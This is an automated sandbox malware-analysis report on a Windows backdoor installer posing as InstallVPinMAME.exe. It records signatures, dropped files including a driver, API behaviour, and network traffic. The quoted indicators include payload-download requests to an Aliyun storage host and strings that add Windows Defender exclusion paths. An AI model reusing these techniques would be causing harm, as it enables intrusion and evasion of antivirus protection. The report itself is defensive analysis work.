Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
2b687482300.6345827638.08.exe

Overview

General Information

Sample name:2b687482300.6345827638.08.exe
Analysis ID:1584369
MD5:934c8c307939cd29f7d1d434f1ad09ef
SHA1:452e15ee56888ad6424a15efc523dfc8137516b0
SHA256:3fdcdf14ff5cb781cda7b1920d229ee59b3684b1d9b1ef939d0549ae0f8815be
Tags:backdoorexemsisilverfoxwinosuser-zhuzhu0009
Infos:

Detection

Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Drops PE files to the document folder of the user
Found direct / indirect Syscall (likely to bypass EDR)
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Sample is not signed and drops a device driver
Tries to detect virtualization through RDTSC time measurements
AV process strings found (often used to terminate AV products)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to delete services
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates driver files
Creates files inside the driver directory
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after checking a module file name)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample file is different than original file name gathered from version info
Yara signature match

Classification

  • System is w10x64
  • vtxXmC.exe (PID: 1788 cmdline: C:\Users\user\Documents\vtxXmC.exe MD5: D3709B25AFD8AC9B63CBD4E1E1D962B9)
  • vtxXmC.exe (PID: 1532 cmdline: C:\Users\user\Documents\vtxXmC.exe MD5: D3709B25AFD8AC9B63CBD4E1E1D962B9)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
12.2.vtxXmC.exe.2780000.1.unpackINDICATOR_SUSPICIOUS_DisableWinDefenderDetects executables containing artifcats associated with disabling Widnows DefenderditekSHen
  • 0x1fb0f:$e1: Microsoft\Windows Defender\Exclusions\Paths
  • 0x1fbc2:$e1: Microsoft\Windows Defender\Exclusions\Paths
  • 0x1fcd2:$e1: Microsoft\Windows Defender\Exclusions\Paths
  • 0x1fc20:$e2: Add-MpPreference -ExclusionPath
13.2.vtxXmC.exe.2950000.1.unpackINDICATOR_SUSPICIOUS_DisableWinDefenderDetects executables containing artifcats associated with disabling Widnows DefenderditekSHen
  • 0x1fb0f:$e1: Microsoft\Windows Defender\Exclusions\Paths
  • 0x1fbc2:$e1: Microsoft\Windows Defender\Exclusions\Paths
  • 0x1fcd2:$e1: Microsoft\Windows Defender\Exclusions\Paths
  • 0x1fc20:$e2: Add-MpPreference -ExclusionPath
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: 2b687482300.6345827638.08.exeReversingLabs: Detection: 13%
Source: 2b687482300.6345827638.08.exeVirustotal: Detection: 12%Perma Link
Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
Source: unknownHTTPS traffic detected: 39.103.20.34:443 -> 192.168.2.7:49968 version: TLS 1.2
Source: Binary string: c:\tools_git_priv\truesight\driver\objfre_win7_amd64\amd64\TrueSight.pdb source: 189atohci.sys.0.dr
Source: Binary string: y:\avsdk5\engine\make\build\public\64-bit\vseamps.pdb source: vtxXmC.exe, 0000000C.00000002.2266200767.0000000140014000.00000002.00000001.01000000.00000008.sdmp, vtxXmC.exe, 0000000C.00000000.2260467149.0000000140014000.00000002.00000001.01000000.00000008.sdmp, vtxXmC.exe, 0000000D.00000002.2275481203.0000000140014000.00000002.00000001.01000000.00000008.sdmp, vtxXmC.exe, 0000000D.00000000.2269010970.0000000140014000.00000002.00000001.01000000.00000008.sdmp, vtxXmC.exe.0.dr
Source: C:\Users\user\Documents\vtxXmC.exeCode function: 12_2_00007FFB23B0A1B8 FindFirstFileExW,12_2_00007FFB23B0A1B8
Source: C:\Users\user\Documents\vtxXmC.exeCode function: 4x nop then mov rax, qword ptr [rsp+78h]12_2_000000014000DFFE
Source: C:\Users\user\Documents\vtxXmC.exeCode function: 4x nop then mov rax, qword ptr [rsp+78h]12_2_000000014000DDFF
Source: C:\Users\user\Documents\vtxXmC.exeCode function: 4x nop then movsxd rbx, qword ptr [r14+10h]12_2_0000000140011270
Source: C:\Users\user\Documents\vtxXmC.exeCode function: 4x nop then mov rax, qword ptr [rsp+78h]12_2_000000014000DE96
Source: C:\Users\user\Documents\vtxXmC.exeCode function: 4x nop then mov rax, qword ptr [rsp+78h]12_2_000000014000DEFB
Source: C:\Users\user\Documents\vtxXmC.exeCode function: 4x nop then mov rax, qword ptr [rsp+78h]12_2_000000014000E178
Source: C:\Users\user\Documents\vtxXmC.exeCode function: 4x nop then mov rax, qword ptr [rsp+78h]12_2_000000014000DDD9
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /i.dat HTTP/1.1User-Agent: GetDataHost: msd1sq.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /a.gif HTTP/1.1User-Agent: GetDataHost: msd1sq.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /b.gif HTTP/1.1User-Agent: GetDataHost: msd1sq.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /c.gif HTTP/1.1User-Agent: GetDataHost: msd1sq.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /d.gif HTTP/1.1User-Agent: GetDataHost: msd1sq.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /s.dat HTTP/1.1User-Agent: GetDataHost: msd1sq.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /s.jpg HTTP/1.1User-Agent: GetDataHost: msd1sq.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
Source: global trafficDNS traffic detected: DNS query: msd1sq.oss-cn-beijing.aliyuncs.com
Source: 189atohci.sys.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceCodeSigningCA-1.crt0
Source: 189atohci.sys.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: 189atohci.sys.0.dr, vtxXmC.exe.0.drString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: 189atohci.sys.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: 189atohci.sys.0.drString found in binary or memory: http://crl3.digicert.com/ha-cs-2011a.crl0.
Source: 189atohci.sys.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: 189atohci.sys.0.drString found in binary or memory: http://crl4.digicert.com/ha-cs-2011a.crl0L
Source: 189atohci.sys.0.drString found in binary or memory: http://ocsp.digicert.com0I
Source: 189atohci.sys.0.drString found in binary or memory: http://ocsp.digicert.com0P
Source: 189atohci.sys.0.dr, vtxXmC.exe.0.drString found in binary or memory: http://ocsp.thawte.com0
Source: vtxXmC.exe.0.drString found in binary or memory: http://s.symcb.com/pca3-g5.crl0
Source: vtxXmC.exe.0.drString found in binary or memory: http://s.symcb.com/universal-root.crl0
Source: vtxXmC.exe.0.drString found in binary or memory: http://s.symcd.com06
Source: vtxXmC.exe.0.drString found in binary or memory: http://s.symcd.com0_
Source: vtxXmC.exe.0.drString found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
Source: vtxXmC.exe.0.drString found in binary or memory: http://s2.symcb.com0
Source: vtxXmC.exe.0.drString found in binary or memory: http://sv.symcb.com/sv.crl0a
Source: vtxXmC.exe.0.drString found in binary or memory: http://sv.symcb.com/sv.crt0
Source: vtxXmC.exe.0.drString found in binary or memory: http://sv.symcd.com0&
Source: vtxXmC.exe.0.drString found in binary or memory: http://sw.symcb.com/sw.crl0
Source: vtxXmC.exe.0.drString found in binary or memory: http://sw.symcd.com0
Source: vtxXmC.exe.0.drString found in binary or memory: http://sw1.symcb.com/sw.crt0
Source: vtxXmC.exe.0.drString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
Source: 189atohci.sys.0.dr, vtxXmC.exe.0.drString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: vtxXmC.exe.0.drString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
Source: 189atohci.sys.0.dr, vtxXmC.exe.0.drString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: 189atohci.sys.0.dr, vtxXmC.exe.0.drString found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: vtxXmC.exe.0.drString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
Source: 189atohci.sys.0.drString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: vtxXmC.exe.0.drString found in binary or memory: http://www.symauth.com/cps0(
Source: vtxXmC.exe.0.drString found in binary or memory: http://www.symauth.com/rpa00
Source: vtxXmC.exe.0.drString found in binary or memory: https://d.symcb.com/cps0%
Source: vtxXmC.exe.0.drString found in binary or memory: https://d.symcb.com/rpa0
Source: vtxXmC.exe.0.drString found in binary or memory: https://d.symcb.com/rpa0)
Source: vtxXmC.exe.0.drString found in binary or memory: https://d.symcb.com/rpa0.
Source: 2b687482300.6345827638.08.exe, 00000000.00000003.2104998288.0000000000584000.00000004.00000020.00020000.00000000.sdmp, 2b687482300.6345827638.08.exe, 00000000.00000003.2124008683.000000000055B000.00000004.00000020.00020000.00000000.sdmp, 2b687482300.6345827638.08.exe, 00000000.00000003.2123903061.00000000005B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://msd1sq.oss-cn-beijing.aliyuncs.com/
Source: 2b687482300.6345827638.08.exe, 00000000.00000003.2105058607.000000000055B000.00000004.00000020.00020000.00000000.sdmp, 2b687482300.6345827638.08.exe, 00000000.00000003.2123961212.000000000055A000.00000004.00000020.00020000.00000000.sdmp, 2b687482300.6345827638.08.exe, 00000000.00000003.2124008683.000000000055B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://msd1sq.oss-cn-beijing.aliyuncs.com/1-2246122658-3693405117-2476756634-1003
Source: 2b687482300.6345827638.08.exe, 00000000.00000003.2105058607.000000000055B000.00000004.00000020.00020000.00000000.sdmp, 2b687482300.6345827638.08.exe, 00000000.00000003.2123961212.000000000055A000.00000004.00000020.00020000.00000000.sdmp, 2b687482300.6345827638.08.exe, 00000000.00000003.2124008683.000000000055B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://msd1sq.oss-cn-beijing.aliyuncs.com/3
Source: 2b687482300.6345827638.08.exe, 00000000.00000003.2105058607.000000000055B000.00000004.00000020.00020000.00000000.sdmp, 2b687482300.6345827638.08.exe, 00000000.00000003.2123961212.000000000055A000.00000004.00000020.00020000.00000000.sdmp, 2b687482300.6345827638.08.exe, 00000000.00000003.2124008683.000000000055B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://msd1sq.oss-cn-beijing.aliyuncs.com/7-2476756634-1003
Source: 2b687482300.6345827638.08.exe, 00000000.00000003.2123903061.00000000005B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://msd1sq.oss-cn-beijing.aliyuncs.com/a.gif
Source: 2b687482300.6345827638.08.exe, 00000000.00000003.2104998288.00000000005B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://msd1sq.oss-cn-beijing.aliyuncs.com/a.gif.
Source: 2b687482300.6345827638.08.exe, 00000000.00000003.2104998288.00000000005B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://msd1sq.oss-cn-beijing.aliyuncs.com/a.gifb
Source: 2b687482300.6345827638.08.exe, 00000000.00000003.2104998288.00000000005B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://msd1sq.oss-cn-beijing.aliyuncs.com/a.gifg
Source: 2b687482300.6345827638.08.exe, 00000000.00000003.2104998288.00000000005B2000.00000004.00000020.00020000.00000000.sdmp, 2b687482300.6345827638.08.exe, 00000000.00000003.2123903061.00000000005B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://msd1sq.oss-cn-beijing.aliyuncs.com/a.gifhttps://msd1sq.oss-cn-beijing.aliyuncs.com/b.gifhttp
Source: 2b687482300.6345827638.08.exe, 00000000.00000003.2123903061.0000000000583000.00000004.00000020.00020000.00000000.sdmp, 2b687482300.6345827638.08.exe, 00000000.00000003.2104998288.0000000000584000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://msd1sq.oss-cn-beijing.aliyuncs.com/a.gifjC
Source: 2b687482300.6345827638.08.exe, 00000000.00000003.2104998288.00000000005B2000.00000004.00000020.00020000.00000000.sdmp, 2b687482300.6345827638.08.exe, 00000000.00000003.2123903061.00000000005B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://msd1sq.oss-cn-beijing.aliyuncs.com/a.gifs
Source: 2b687482300.6345827638.08.exe, 00000000.00000003.2104998288.00000000005B2000.00000004.00000020.00020000.00000000.sdmp, 2b687482300.6345827638.08.exe, 00000000.00000003.2123903061.00000000005B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://msd1sq.oss-cn-beijing.aliyuncs.com/b.gif
Source: 2b687482300.6345827638.08.exe, 00000000.00000003.2123903061.00000000005B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://msd1sq.oss-cn-beijing.aliyuncs.com/b.gifK
Source: 2b687482300.6345827638.08.exe, 00000000.00000003.2123903061.00000000005B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://msd1sq.oss-cn-beijing.aliyuncs.com/b.gifP
Source: 2b687482300.6345827638.08.exe, 00000000.00000003.2123903061.00000000005B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://msd1sq.oss-cn-beijing.aliyuncs.com/b.gifR
Source: 2b687482300.6345827638.08.exe, 00000000.00000003.2123903061.00000000005B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://msd1sq.oss-cn-beijing.aliyuncs.com/b.gifb
Source: 2b687482300.6345827638.08.exe, 00000000.00000003.2123903061.00000000005B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://msd1sq.oss-cn-beijing.aliyuncs.com/b.gifg
Source: 2b687482300.6345827638.08.exe, 00000000.00000003.2104998288.00000000005B2000.00000004.00000020.00020000.00000000.sdmp, 2b687482300.6345827638.08.exe, 00000000.00000003.2123903061.00000000005B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://msd1sq.oss-cn-beijing.aliyuncs.com/c.gif
Source: 2b687482300.6345827638.08.exe, 00000000.00000003.2104998288.00000000005B2000.00000004.00000020.00020000.00000000.sdmp, 2b687482300.6345827638.08.exe, 00000000.00000003.2123903061.00000000005B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://msd1sq.oss-cn-beijing.aliyuncs.com/d.gif
Source: 2b687482300.6345827638.08.exe, 00000000.00000003.2123961212.000000000055A000.00000004.00000020.00020000.00000000.sdmp, 2b687482300.6345827638.08.exe, 00000000.00000003.2124008683.000000000055B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://msd1sq.oss-cn-beijing.aliyuncs.com/ft
Source: 2b687482300.6345827638.08.exe, 00000000.00000003.2123961212.000000000055A000.00000004.00000020.00020000.00000000.sdmp, 2b687482300.6345827638.08.exe, 00000000.00000003.2124008683.000000000055B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://msd1sq.oss-cn-beijing.aliyuncs.com/h
Source: 2b687482300.6345827638.08.exe, 00000000.00000003.2104998288.00000000005B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://msd1sq.oss-cn-beijing.aliyuncs.com/i.dat
Source: 2b687482300.6345827638.08.exe, 00000000.00000003.2105058607.000000000055B000.00000004.00000020.00020000.00000000.sdmp, 2b687482300.6345827638.08.exe, 00000000.00000003.2123961212.000000000055A000.00000004.00000020.00020000.00000000.sdmp, 2b687482300.6345827638.08.exe, 00000000.00000003.2124008683.000000000055B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://msd1sq.oss-cn-beijing.aliyuncs.com/pgY
Source: 189atohci.sys.0.drString found in binary or memory: https://www.digicert.com/CPS0
Source: unknownNetwork traffic detected: HTTP traffic on port 49973 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49974
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49973
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49972
Source: unknownNetwork traffic detected: HTTP traffic on port 49969 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49970 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49971
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49970
Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49971 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49972 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49968 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49969
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49968
Source: unknownHTTPS traffic detected: 39.103.20.34:443 -> 192.168.2.7:49968 version: TLS 1.2

System Summary

barindex
Source: 12.2.vtxXmC.exe.2780000.1.unpack, type: UNPACKEDPEMatched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
Source: 13.2.vtxXmC.exe.2950000.1.unpack, type: UNPACKEDPEMatched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
Source: C:\Users\user\Documents\vtxXmC.exeCode function: 12_2_0000000140006C95 NtAllocateVirtualMemory,12_2_0000000140006C95
Source: C:\Users\user\Documents\vtxXmC.exeCode function: 12_2_0000000140001520 OpenSCManagerW,GetLastError,OpenServiceW,GetLastError,CloseServiceHandle,DeleteService,GetLastError,CloseServiceHandle,CloseServiceHandle,StartServiceCtrlDispatcherW,12_2_0000000140001520
Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exeFile created: C:\Windows\System32\drivers\189atohci.sysJump to behavior
Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exeFile created: C:\Windows\System32\drivers\189atohci.sysJump to behavior
Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exeFile created: C:\Windows\System32\drivers\189atohci.sysJump to behavior
Source: C:\Users\user\Documents\vtxXmC.exeCode function: 12_2_000000014000C3F012_2_000000014000C3F0
Source: C:\Users\user\Documents\vtxXmC.exeCode function: 12_2_000000014000CC0012_2_000000014000CC00
Source: C:\Users\user\Documents\vtxXmC.exeCode function: 12_2_0000000140001A3012_2_0000000140001A30
Source: C:\Users\user\Documents\vtxXmC.exeCode function: 12_2_000000014000C2A012_2_000000014000C2A0
Source: C:\Users\user\Documents\vtxXmC.exeCode function: 12_2_00000001400022C012_2_00000001400022C0
Source: C:\Users\user\Documents\vtxXmC.exeCode function: 12_2_00000001400110F012_2_00000001400110F0
Source: C:\Users\user\Documents\vtxXmC.exeCode function: 12_2_0000000140010CF012_2_0000000140010CF0
Source: C:\Users\user\Documents\vtxXmC.exeCode function: 12_2_000000014000930012_2_0000000140009300
Source: C:\Users\user\Documents\vtxXmC.exeCode function: 12_2_000000014000BB7012_2_000000014000BB70
Source: C:\Users\user\Documents\vtxXmC.exeCode function: 12_2_0000000140003F8012_2_0000000140003F80
Source: C:\Users\user\Documents\vtxXmC.exeCode function: 12_2_00000001400103D012_2_00000001400103D0
Source: C:\Users\user\Documents\vtxXmC.exeCode function: 12_2_00007FFB23B1024812_2_00007FFB23B10248
Source: C:\Users\user\Documents\vtxXmC.exeCode function: 12_2_00007FFB23B0A1B812_2_00007FFB23B0A1B8
Source: Joe Sandbox ViewDropped File: C:\Users\user\Documents\vtxXmC.exe D2537DC4944653EFCD48DE73961034CFD64FB7C8E1BA631A88BBA62CCCC11948
Source: 2b687482300.6345827638.08.exe, 00000000.00000000.1238623385.0000000141D75000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameInstallVPinMAME.exeR vs 2b687482300.6345827638.08.exe
Source: 2b687482300.6345827638.08.exeBinary or memory string: OriginalFilenameInstallVPinMAME.exeR vs 2b687482300.6345827638.08.exe
Source: 12.2.vtxXmC.exe.2780000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
Source: 13.2.vtxXmC.exe.2950000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
Source: 189atohci.sys.0.drBinary string: \Device\Driver\
Source: 189atohci.sys.0.drBinary string: \Device\TrueSight
Source: classification engineClassification label: mal80.evad.winEXE@3/12@1/1
Source: C:\Users\user\Documents\vtxXmC.exeCode function: 12_2_0000000140003F80 InitializeCriticalSection,#4,#4,GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,EnterCriticalSection,LeaveCriticalSection,GetVersionExW,RpcSsDontSerializeContext,RpcServerUseProtseqEpW,RpcServerRegisterIfEx,RpcServerListen,CreateWaitableTimerW,CreateEventW,SetWaitableTimer,12_2_0000000140003F80
Source: C:\Users\user\Documents\vtxXmC.exeCode function: GetModuleFileNameW,OpenSCManagerW,GetLastError,CreateServiceW,CloseServiceHandle,GetLastError,CloseServiceHandle,12_2_0000000140001430
Source: C:\Users\user\Documents\vtxXmC.exeCode function: 12_2_0000000140001520 OpenSCManagerW,GetLastError,OpenServiceW,GetLastError,CloseServiceHandle,DeleteService,GetLastError,CloseServiceHandle,CloseServiceHandle,StartServiceCtrlDispatcherW,12_2_0000000140001520
Source: C:\Users\user\Documents\vtxXmC.exeCode function: 12_2_0000000140001520 OpenSCManagerW,GetLastError,OpenServiceW,GetLastError,CloseServiceHandle,DeleteService,GetLastError,CloseServiceHandle,CloseServiceHandle,StartServiceCtrlDispatcherW,12_2_0000000140001520
Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\i[1].datJump to behavior
Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exeMutant created: \Sessions\1\BaseNamedObjects\26f3475fc22
Source: 2b687482300.6345827638.08.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: 2b687482300.6345827638.08.exeReversingLabs: Detection: 13%
Source: 2b687482300.6345827638.08.exeVirustotal: Detection: 12%
Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exeFile read: C:\Users\user\Desktop\2b687482300.6345827638.08.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\2b687482300.6345827638.08.exe "C:\Users\user\Desktop\2b687482300.6345827638.08.exe"
Source: unknownProcess created: C:\Users\user\Documents\vtxXmC.exe C:\Users\user\Documents\vtxXmC.exe
Source: unknownProcess created: C:\Users\user\Documents\vtxXmC.exe C:\Users\user\Documents\vtxXmC.exe
Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exeSection loaded: pid.dllJump to behavior
Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exeSection loaded: hid.dllJump to behavior
Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exeSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exeSection loaded: schannel.dllJump to behavior
Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exeSection loaded: msv1_0.dllJump to behavior
Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exeSection loaded: ntlmshared.dllJump to behavior
Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exeSection loaded: cryptdll.dllJump to behavior
Source: C:\Users\user\Documents\vtxXmC.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Documents\vtxXmC.exeSection loaded: vselog.dllJump to behavior
Source: C:\Users\user\Documents\vtxXmC.exeSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\Documents\vtxXmC.exeSection loaded: vselog.dllJump to behavior
Source: C:\Users\user\Documents\vtxXmC.exeSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
Source: 2b687482300.6345827638.08.exeStatic PE information: Image base 0x140000000 > 0x60000000
Source: 2b687482300.6345827638.08.exeStatic file information: File size 30883840 > 1048576
Source: 2b687482300.6345827638.08.exeStatic PE information: Raw size of .data is bigger than: 0x100000 < 0x1d58200
Source: 2b687482300.6345827638.08.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: c:\tools_git_priv\truesight\driver\objfre_win7_amd64\amd64\TrueSight.pdb source: 189atohci.sys.0.dr
Source: Binary string: y:\avsdk5\engine\make\build\public\64-bit\vseamps.pdb source: vtxXmC.exe, 0000000C.00000002.2266200767.0000000140014000.00000002.00000001.01000000.00000008.sdmp, vtxXmC.exe, 0000000C.00000000.2260467149.0000000140014000.00000002.00000001.01000000.00000008.sdmp, vtxXmC.exe, 0000000D.00000002.2275481203.0000000140014000.00000002.00000001.01000000.00000008.sdmp, vtxXmC.exe, 0000000D.00000000.2269010970.0000000140014000.00000002.00000001.01000000.00000008.sdmp, vtxXmC.exe.0.dr
Source: C:\Users\user\Documents\vtxXmC.exeCode function: 12_2_000000014000F000 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,12_2_000000014000F000

Persistence and Installation Behavior

barindex
